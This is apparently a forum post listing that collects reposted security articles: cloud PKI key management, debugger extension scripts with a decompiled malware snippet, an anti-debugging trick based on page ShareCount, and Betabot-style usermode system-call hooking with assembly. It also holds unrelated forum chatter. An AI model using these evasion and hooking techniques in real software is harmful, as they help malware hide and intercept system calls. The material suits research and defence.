key is over or its validity expires, secret and private keys should be destroyed in an efficient manner. All the traces of keys should be completely removed from the whole environment, even from the removal media, and vaults where the keys are stored for backup processes. [h=2]PKI Risks on Migrated Data[/h] We cannot sit back and relax by implementing a PKI over the business applications and data which is migrated to the cloud, because when the data migrates to the cloud, various issues tend to arise, such as: Because in the way the cloud model is designed, control over the migrated data to the cloud is completely lost. The key management server, which is responsible for storing and managing keys – if hosted in the cloud then there is a risk from the CSP side. The risk is in how we can be sure that the CSP is making sure that our keys are secure, i.e. what access controls mechanism, SOD (segregation of duties) and policies the CSP (Cloud Service Provider) has put in place. If some third party vendor solution is leveraged for PKI deployment, then where all the keys are used; what model for key management the vendor is using; how the vendor is making sure that even if deployed in cloud, customer keys are secured from the vendor remote access (SaaS APIs) and from some Virtual Machine (VM) corruption event such as, what will happen if a snapshot of the VM is stolen – will the keys reside in the snapshot, and if yes, for how long? How to make sure that if the customer has leveraged a vendor’s PKI SaaS service, then even the vendor does not have access to the customer’s keys, and what measures the vendor has implemented to address the multi-tenant issue. After decommissioning of systems in the cloud, how to make sure that data is completely removed from systems. [h=2]Recommendations[/h] The below sections describe some of the best practices and design that organizations must follow in order to reap true benefits of PKI in cloud. The key management server must be hosted within the organization, and whenever the data which is hosted in the cloud needs keys to decrypt the data as a part of end-user request, the key management server provides them. The key used for decryption should never be stored in the cloud VMs and must be in-memory for a few-nano seconds only. With the above discussed model, all the data that is leaving and entering the organizations can be encrypted and decrypted respectively. All the VMs that are hosted in the cloud must be encrypted to protect data loss when a VM snapshot is stolen. When the data which is encrypted and put in a cloud is no longer needed, the organization must revoke the keys associated with it, so that even if some trail of data remains in the decommissioned VM, it cannot be decrypted. The Hardware Security Model (HSM) should be used to store keys for cryptographic operations such as encryption, decryption, etc. Use of old and insecure protocols like Data Encryption Standard (DES) must be avoided. [h=2]Conclusion[/h] An environment with a poorly managed Public Key Infrastructure (PKI) is as good as an environment with no PKI. However, when organizations plan to migrate data to a cloud and decided to implement PKI onto any cloud model, i.e. public or private, they should make sure that complete ownership of the keys falls on their plate. [h=2]References[/h] https://cloudsecurityalliance.org/guidance/csaguide.v3.0.pdf http://research.microsoft.com/pubs/132506/distributed%20key%20lifecycle%20management.pdf The Key Management Lifecycle (The Falcon's View) By Lohit Mehta|June 30th, 2014 Sursa: Public Key Infrastructure (PKI) in the Cloud - InfoSec Institute
  17. Extending Debuggers Sometimes we come across situations when we are in need of doing something inside our debuggers or to extend the functionality of them. For such things, debuggers usually provide an API interface to extend or provide extra functionality for the debugger. There are two types of API provided by the debuggers: 1: SDK API 2: Scripting API One can choose any based on the requirements. Usually when there is a rapid requirement, scripting will come in handy, but if something requires system or low level access, then SDK is useful. SDK API requires being compiled, while scripts can be modified easily. Ollydbg Plugin Interface Ollydbg supports API for plugins. Plugins are compiled DLL written in C programming language. The following constants define particular actions in a debugger context. #define ODBG_Plugindata _ODBG_Plugindata #define ODBG_Plugininit _ODBG_Plugininit #define ODBG_Pluginmainloop _ODBG_Pluginmainloop #define ODBG_Pluginsaveudd _ODBG_Pluginsaveudd #define ODBG_Pluginuddrecord _ODBG_Pluginuddrecord #define ODBG_Pluginmenu _ODBG_Pluginmenu #define ODBG_Pluginaction _ODBG_Pluginaction #define ODBG_Pluginshortcut _ODBG_Pluginshortcut #define ODBG_Pluginreset _ODBG_Pluginreset #define ODBG_Pluginclose _ODBG_Pluginclose #define ODBG_Plugindestroy _ODBG_Plugindestroy #define ODBG_Paused _ODBG_Paused #define ODBG_Pausedex _ODBG_Pausedex #define ODBG_Plugincmd _ODBG_Plugincmd Plugins for ollybdg are written as shared library in C. We need to define the dll enrty point and inilitize the plug in before it is used. Events are also defined using exports. Plugins are initialized using the ODBG_Plugininit() export function. /******************************************************* Sample Ollgdbg Plugin file * *******************************************************/ #include <stdio.h> #include <plugin.h> #pragma once #pramga Comment ("lib", "ollydbg.lib") // Inlude the library file BOOL WINAPI DllEntryPoint(HINSTANCE hi,DWORD reason,LPVOID reserved) { if (reason==DLL_PROCESS_ATTACH) hinst=hi; // Mark plugin instance return 1; // Report success }; extc int _export cdecl ODBG_Plugininit() { } extc void _export cdecl ODBG_Pluginmainloop(DEBUG_EVENT *debugevent) { }; extc void _export cdecl ODBG_Pluginaction(int origin,int action,void *item) { t_bookmark mark,*pb; t_dump *pd; if (origin==PM_MAIN) { switch (action) { case 0: break; case 1: MessageBox(NULL, "Hello World", "Hello World! Plugin ", MB_OK); default: break; }; } } Immunity Scripting Immunity debugger also supports scripting based on Python programming language. The scripts written for immunity debugger are known as pycommands. They can be executed in the command bar as !. Immunity scripting supports breakpoints, hooking, and loggers. The default skeleton for a pycommands script is: # !usr/bin/pythonimport immlib def main(args): dbg = immlib.Debugger() return "" dbg = immlib.Debugger() – define a instance to a debugger class The following are some of the basic functions inside the Debugger class: The script’s main body is located in the main function with arguments as args. To execute the script, we need to place the file in the “C:Program FilesImmunity IncImmunity DebuggerPyCommands” directory and execute from the immunity command bar as !filename Let’s now create a dummy hello world script that writes to the log window: import immlibdef main(args): dbg = immlib.Debugger() dbg.writeLog(“Hello world!”) return "" We can save this file in the “C:Program FilesImmunity IncImmunity DebuggerPyCommands” as helloworld.py and it can be executed using the following command: !helloworld There are more functions inside Debugger() class, let’s try to explore and use them. Getting the PEB address getPEBAddress() is a method inside the Debugger class that can be used to get the PEB address of the loaded application inside the debugger. We can use the PEB address to patch many things. PEB is mainly used for thread related structures and processing information. We can get the details in Loaded modules, for example what this malware code does with PEB: typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[1]; PVOID Reserved3[2]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; BYTE Reserved4[104]; PVOID Reserved5[52]; PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; BYTE Reserved6[128]; PVOID Reserved7[1]; ULONG SessionId; } PEB, *PPEB; v9 = *(_DWORD *)"LoadLibraryExA"; v10 = *(_DWORD *)&aLoadlibraryexa[4]; v11 = *(_DWORD *)&aLoadlibraryexa[8]; v12 = *(_WORD *)&aLoadlibraryexa[12]; v13 = aLoadlibraryexa[14]; v15 = sub_4001E92(); v20 = 0; v16 = (int (__thiscall *)(int, int, int *))sub_4001EA7(v15, "GetProcAddress"); v20 = v16(v5, v15, &v9); v3 = a1; result = *(_DWORD *)(a1 + 60); for ( i = a1 + *(_DWORD *)(result + a1 + 128); *(_DWORD *)(i + 4) || *(_DWORD *)(i + 12); i += 20 ) { v7 = v3 + *(_DWORD *)i; for ( j = v3 + *(_DWORD *)(i + 16); ; j += 4 ) { result = *(_DWORD *)v7; if ( !*(_DWORD *)v7 ) break; v15 = -1; if ( result < 0 ) { v2 = (unsigned __int16)result; v15 = (unsigned __int16)result; } v14 = v3 + result; v8 = *(_DWORD *)(i + 12); v17 = v3 + v8; v19 = ((int (__fastcall *)(int, int, int, _DWORD, _DWORD))v20)(v3, v2, v3 + v8, 0, 0); if ( v15 == -1 ) { v17 = v14 + 2; v18 = ((int (__stdcall *)(int, int))v16)(v19, v14 + 2); } else { v17 = v15; v18 = ((int (__stdcall *)(int, int))v16)(v19, v15); } if ( *(_DWORD *)j != v18 ) *(_DWORD *)j = v18; v3 = a1; v7 += 4; } } return result; } This code snippet loads LEP loaded modules and parses the IAT. Now let’s try to try to write a call counter in pycommands. import immlibfrom immlib import LogBpHook times = " class instructionHook(LogBpHook): def __init__(self): LogBpHook.__init__(self) return def run(self, regs): global times imm = immlib.Debugger() imm.log("instruction Executed %d" % times) times = times + 1 return def main(args): memlocation = 0x401029 dbg = immlib.Debugger() logbp = instructionHook() funcName = dbg.getFunction(imemlocation).getName() logbp.add(funcName,i) return "Hooks Placed" By SecRat|June 25th, 2014 Sursa: Extending Debuggers - InfoSec Institute
  18. [h=3]ShareCount As Anti-Debugging Trick[/h]In this post i will share with you an Anti-Debugging trick that is very similar to the "PAGE_EXECUTE_WRITECOPY" trick mentioned here, where we had to flag code section as writeable such that any memory write to its page(s) would force OS to change the page protection from PAGE_EXECUTE_WRITECOPY to PAGE_EXECUTE_READWRITE. But in this case we don't have to make any modifications to the code section's page protection. We will just query the process for its current working set info. Among the stuff we receive querying the working set of a process are two fields, "Shared" and "ShareCount". By default the OS assumes the memory pages of code section (Non-writable sections) should share physical memory across all process instances. This is true till one process instance commits a memory-write to the shared page. At this point the page becomes no longer shared. Thus, querying the working set of the process and inspecting the "Shared" and/or "ShareCount" fields for our Code section pages would reveal the presence of debugger, only if the debugger uses INT3 for breakpoints. To implement the trick, all you have to do is call the "QueryWorkingSet" or "QueryWorkingSetEx" functions. N.B. You can also use the "ZwQueryVirtualMemory" function with the "MemoryInformationClass" parameter set to MemoryWorkingSetList for more portable code. Code from here and demo from here. Tested on Windows 7. For any suggestions, leave me a comment or drop me a mail waliedassar@gmail.com. Sursa: waliedassar: ShareCount As Anti-Debugging Trick
  19. [h=3]Usermode System Call hooking - Betabot Style[/h] This is literally the most requested article ever, I've had loads of people messaging me about this (after the Betabot malware made it famous). I had initially decided not to do an article about it, because it was fairly undocumented and writing an article may have led to more people using it; However, yesterday someone linked me to a few blogs posting their implementations of the hook code (without explanation), so I've finally decided to go over it seeming as the code is already available. [h=2]Win32/64 System Calls[/h] System call is a term used to describe functions that do not execute code in usermode, instead they transfer execution to the kernel where the actual work is done. A good example of these is the native API (Ex: NtCreateFile\ZwCreateFile). None of the functions beginning with Nt or Zw actually do their work in usermode, they simply call into the kernel and allow the kernel mode function with the same name to do their work (ntdll!NtCreateFile calls ntoskrnl!NtCreateFile). Before entering the kernel, all native functions execute some common code, this is known as KiFastSystemCall on 32-bit windows and WOW32Reserved under WOW64 (32-bit process on 64-bit windows). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Native function call path in user mode under windows 32-bit[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Native function call path in user mode under WOW64[/TD] [/TR] [/TABLE] As is evident in both examples: Nt* functions make a call via a 32-bit pointer to KiFastSystemCall (x86) or X86SwitchTo64BitMode (WOW64). Theoretically we could just replace the pointer at SharedUserData!SystemCallStub and WOW32Reserved with a pointer to our code; However, in practice this doesn't work. SharedUserData is a shared page mapped into every process by the kernel, thus it's only writable from kernel mode. On the other hand WOW32Reserved is writable from user mode, but it exists inside the thread environment block (TEB), so in order to hook it we'd have to modify the TEB for every running thread. [h=2]KiFastSystemCall Hook[/h] Because SharedUserData is non-writable, the only other place we can target is KiFastSystemCall which is 5 byte (enough space for a 32-bit jump). Sadly that actually turned out not to be the case because the last byte, 0xC3 (retn), is needed by KiFastSystemCallRet and cannot be modified, which leaves only 4 writable bytes. The sysenter instruction is supported by all modern CPUs and is the fastest way to enter the kernel. On ancient CPUs (before sysenter was invented) an interrupt was used (int 0x2E), for compatibility it was kept in all subsequent versions of windows. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]The now obsolete KiIntSystemCall[/TD] [/TR] [/TABLE] Here you can see, KiIntSystemCall has a glorious 7 writable bytes (enough space for a 32-bit jump and some) it's also within short jump range of KiFastSystemCall. As you've probably guessed by now, we can do a 2 byte short jump from KiFastSystemCall to KiIntSystemCall and then a 32-bit jump from within KiIntSystemCall to our hook procedure. Now, what if something calls KiIntSystemCall? Well, it's unlikely but we can handle that too: The rule for the direction flag on windows is that it should always be cleared after a call (that is, a function should never assume it to still be set after making a call). We could use the first byte of KiIntSystemCall for STD (set direction flag), then use the first byte of KiFastSystemCall for CLD (clear direction flag) followed by a jump to KiIntSystemCall+1, that way our hook procedure can use the direction flag to see which calls came from which function. [h=2]WOW32Reserved Hook[/h] This is a lot simpler, either we can keep track of every thread and hook WOW32Reserved in each thread's environment block (i think this is what betabot does), or we simply overwrite X86SwitchTo64BitMode which is 7 bytes, writable from user mode, and pointed to by the WOW32Reserve field of every thread's environment block. [h=2]Dispatching[/h] Most people who write hooks are used to redirecting one function to another; however, because both of these hooks are placed on common code: every single native function will call the hook procedure. Obviously we're going to need a way to tell NtCreateFile calls from NtCreateProcess and so on, or the process is just going to crash and burn. If we dissemble the first 5 bytes of any native function it will always be "mov eax, XX", this value is the ordinal of the function within the System Service Dispatch Table (SSDT). Once the call enters the kernel, a function will use this number to identify which entry in the SSDT to call, then call it (meaning each function has a unique number). When our hook in called, the SSDT ordinal will still be in the eax register, all we need to do is gather the SSDT ordinals for all the functions we need (by disassembling the first 5 bytes), then we can compare the number in eax with the ordinal for the function we wish to intercept calls for: if it's equal we process the call, if not we just call the original code. Comparing the function ordinal with the one we want to hook could be messy, especially if we're hooking multiple functions. cmp eax, [ntcreatefile_ordinal] je ntcreatefile_hook cmp eax, [ntcreateprocess_ordinal] je ntcreateprocess_hook [...] jmp original_code This code is going to get very long and inefficient the more functions are hooked (because every kernel call is passing through this code, the system could slow down), but there's a better way. We can build an array of DWORDs in memory (assuming we just want to hook NtCreateFile & NtCreateProcess, let's say the NtCreateFile ordinal is 0x02 and NtCreateProcess ordinal is 0x04), the array would look like this: my_array+0x00 = (DWORD)NULL my_array+0x04 = (DWORD)NULL my_array+0x08 = (DWORD)ntcreatefile_hook_address my_array+0x0C = (DWORD)NULL my_array+0x10 = (DWORD)ntcreateprocess_hook_address [...] Then we could do something as simple as: lea ecx, [my_array] lea edx, [4*eax+ecx] ;edx will be &my_array[eax] cmp [edx], 0 je original_code call [edx] ;call the address pointed to by edx This is pretty much what the kernel code for calling the SSDT function by its ordinal would do. [h=2]Calling Original Code[/h] As with regular hooking, we just need to store the original code before we hook it. The only difference here is as well as pushing the parameters and calling the original code, the function's ordinal will need to be moved into the eax register. [h=2]Conclusion[/h] Feel free to ask any questions in the comments or on our forum, hopefully this post has covered everything already. Posted by TM Sursa: MalwareTech: Usermode System Call hooking - Betabot Style
  20. Salut, Ma intereseaza daca dintre voi sunt persoane la un master de securitate IT din Bucuresti. Am auzit ca ar cateva variante: 1. Politehnica: SRIC ( Securitatea Retelelor Informatice Complexe ): http://acs.pub.ro/doc/planuri%20master/ro/2011/SRIC.pdf sau MPI ( Managementul si Protectia Informatiei ): http://acs.pub.ro/doc/planuri%20master/ro/2011/MPI.pdf 2. Academia Tehnica Militara: Securitatea Tehnologiei Informatiei: MTA - Master InfoSec 3. Academia de Studii Economice: ISM (IT&C Security Master): ISM - IT&C Security Master - Informatics Security Master 4. Serviciul Roman de Informatii: Intelligence si securitate nationala (cred) Masterul de la SRI mi-a fost recomandat de doua persoane (una de la masterul MPI de la Poli si alta care nu s-a inscris la master), ca cica ar fi cel mai concret si mai bun. In primul rand, nu am gasit ce materii se fac acolo. Apoi, am gasit niste conditii jegoase: "Pe întreaga desf??urare a programului, cursan?ii vor avea statut de angaja?i ai Serviciului Român de Informa?ii, cu toate drepturile ?i obliga?iile ce decurg din acesta" , "sunt dispu?i ca, dup? finalizarea programului universitar de master la care au fost declara?i „Admis”, s? desf??oare activit??i în orice zon? a teritoriului na?ional, potrivit intereselor ?i nevoilor institu?iei", "accept?, în situa?ia în care vor fi declara?i „Admis”, interzicerea ori restrângerea exercit?rii unor drepturi ?i libert??i cet??ene?ti prev?zute de legisla?ia în vigoare", "accept? efectuarea de verific?ri asupra activit??ii ?i comportamentuluilor" etc. Sa fim seriosi. Apoi, eu ma gandesc sa dau la Poli, iar ASE-ul sa fie varianta de rezerva, in caz ca nu intru la celelalte. Mai exact, am auzit cele mai bune lucruri despre SRIC dar si MPI pare acceptabil: mai putin tehnic, dar poate util, mai business asa, nu stiu. Legat de ATM, nu prea sunt sigur, imi e frica sa nu ma trezesc cu niste conditii nesimtite, ca trebuie sa lucrez pentru ei sau mai stiu eu ce. Oricum, am vazut ca trebuie sa faci ceva "practica", care e posibil sa fie cam echivalentul a "lucrezi gratis pentru ei" pentru cateva luni si asta nu ma tenteaza. Iar ASE-ul e versiunea mai light, dupa cum stim cu totii acolo e plin de femei si as merge de placere la cursuri, problema e ca nu as invata mare lucru. Dar na, pot sa invat si in timpul liber ce ma intereseaza. Ar fi cel mai simplu de obtinut diploma, dar nu ar fi la fel de recunoscuta ca cea de la Poli. Asadar alegerea mea ar fi SRIC. Voi ce parere aveti? Daca sunt persoane care cunosc mai multe detalii, m-ar interesat: 1. Cand sunt cursurile? Weekend, seara, sau si in timpul zilei? 2. Cat de mult conteaza prezenta? Pentru ca nu o sa pot ajunge prea des pe acolo. 3. Cat de mare e stresul cu proiectele? Trebuie sa faci proiecte la care sa lucrezi secole, sau ceva mai lejer? 4. Cat de ok sunt materiile care se fac? Cum sunt predate? Bataie de joc? 5. Care dintre ele sunt la buget si care la taxa? Nu e foarte important, dar ar fi mai ok la buget, desi nu ma astept sa prind. 6. Cum e "mediul" acolo, cum sunt studentii, cum sunt cursurile etc? Nu stiu, mi-ar fi de ajutor orice informatie. Bine, cam greu sa imi schimb opinia cu SRIC, dar deocamdata e prima varianta. A doua e ASE, ca sa fie. Voi ce ziceti? Va rog sa nu comentati daca nu aveti nicio legatura cu subiectul. Thanks. Edit: Daca dau la ASE si daca intru, nu cred ca mai pot da la Poli. Deci cel mai probabil voi da doar la Poli, SRIC si MPI. Si astia de la ASE, daca esti admin, te pun sa platesti rapid taxa pe primu semestru.
  21. Salut, Ca exemplu concret, exista persoane si in staff ( nu o sa dau nume, poate ) care au ajuns aici cautand asa ceva: CQ Killer. Si ca sa vezi, au ajuns sa lucreze la firme ale caror produse le folositi voi zilnic si au invatat lucruri pe care nici nu visati sa le stiti voi vreodata. Copiii care cauta "hack-uri" sunt foarte atrasi de domeniul acesta: securitate IT, si o mare parte dintre ei, venind aici pentru tot felul de prostii ajung sa vada ca domeniul e mult mai diversificat si incep sa il exploreze. Nici mie nu mi se pare utila acea sectiune pentru ca nu ma joc. Bine, ma joc, dar ma joc doar asta: http://www.flasharcade.com/tower-defence-games/play/azgard-tower-defense.html . Daca exista incepatori pe aici le recomand sa intre pe acest link, sa descarce CheatEngine si sa incerce sa triseze la acest joc, sa schimbe suma de bani disponibila. CheatEngine cauta in memoria procesului (FlashPlayer_*) o anumita valoare, de exemplu, daca ai 123 de dolari, cauti acea valoare. E posibil sa fie mai multe date in memorie cu valoarea 123. Dar, mai cheltuiesti din bani si ramai cu 111 dolari, de exemplu. Cauti din nou, valoarea 111, Next scan, dintre variabilele pe care le gasisei deja si vei gasi adresa de memorie unde e salvat numarul de dolari pe care o vei putea schimba in 9999999. Incercati asta. Nota: e singura metoda prin care am reusit sa termin joculetul ala nenorocit. Are 100 de stagii.
  22. E prea abstract. Nu e nimic concret.
  23. How to destroy Programmer Productivity The following image about programmer productivity making its rounds on the internet: As Homer Simpson might say, it’s funny because it’s true. I haven’t figured out the secret to being productive yet, largely because I have never been consistently productive. Ever. Joel Spolsky talks about this in one of his blog posts: Sometimes I just can’t get anything done. Sure, I come into the office, putter around, check my email every ten seconds, read the web, even do a few brainless tasks like paying the American Express bill. But getting back into the flow of writing code just doesn’t happen. These bouts of unproductiveness usually last for a day or two. But there have been times in my career as a developer when I went for weeks at a time without being able to get anything done. As they say, I’m not in flow. I’m not in the zone. I’m not anywhere. I’ve read that blog post about half a dozen times now, and It still shocks me that someone who we see as an icon in the programmer community has a problem getting started. I’m glad I’m not alone. I’m not here to share any secret methods to being productive, but I can tell you what has kept me from being productive: Open Floor plans Developers arguing about Django vs. .NET Developers arguing in general A coworker coming up to me and asking, “Hey, did you get that email I sent?” Chewing. Apparently I suffer from Misophonia Not understanding the problem I’m working on Not really believing in the project Not understanding where to start Facing more than one task that needs to be complete BECAUSE THINGS ARE ON ARE RIGHT NOW Things BEING ON FIRE RIGHT NOW DROP EVERYTHING Twitter Notifications on my Phone Email pop ups Really, any pop-ups IMs My wife asking, “Hey, when you have a minute could you do X?” Long build times Noise Constant parade of people going past my desk MandoFun Wikipedia (Seriously, don’t click on any links) Hacker News The Internet in General Things that have contributed to making me productive in the past: Quiet atmosphere Quiet workspace (A private office works wonders) Understanding the next step I need to take in a project Knowing the problem space well No interruptions Seriously: No interruptions Staying off Twitter Staying off Hacker News No hardware problems Loving the project I’m working on Short build + debug time Not debating politics on the internet It’s telling that half of the things that keep me from being productive are problems I’ve created; but some of them aren’t. Like Open Office floor plans. Ultimately, each of us controls what makes us unproductive. I suck at peaceful confrontation. I either come of too strongly, or I sit there and let the other person walk all over me. I’m really not good at it at all. I don’t have any good advice for handling the external forces that contribute to not being productive, but I do know this: Whatever I can control, I should control. That means: Turning off notifications on my iPhone (this has the added benefit of increased battery life) Giving myself a reward for 3 hours of continuous coding (usually in the form of “internet time” like checking Hacker News or twitter) Working from home when I really, really, need to get something done Investing in a good-for-the-price pair of noise canceling headphones Scheduling ‘no meeting’ times on my calendar. These are times shown as busy to everyone else. It’s my work time. Not getting into programmer arguments around the office; people have strong opinions, and the programmers who have arguments love to argue. If there’s an actual business problem that needs to be solved, let’s grab a conference room and come up with the advantages and disadvantages of each approach. Let’s get some data. Let’s not just argue. Position my desk in such a way that passersby aren’t distracting. taking a first pass at the problem, and *then* asking another developer to walk me through the problem so that I can get a better understanding of what to do. This accomplishes two things: First, it allows me to get the ‘lay of the land’ so that I’ll at least have a basic understanding of the forces at work, and Second it allows me to ask more intelligent questions when I ask for help What makes you unproductive, and what do you do to combat it? Sursa: How to destroy Programmer Productivity | George Stocker
  24. Parlamentul Romaniei adopta prezenta lege. Download: http://www.cdep.ro/proiecte/2014/200/60/3/pl263.pdf
×
×
  • Create New...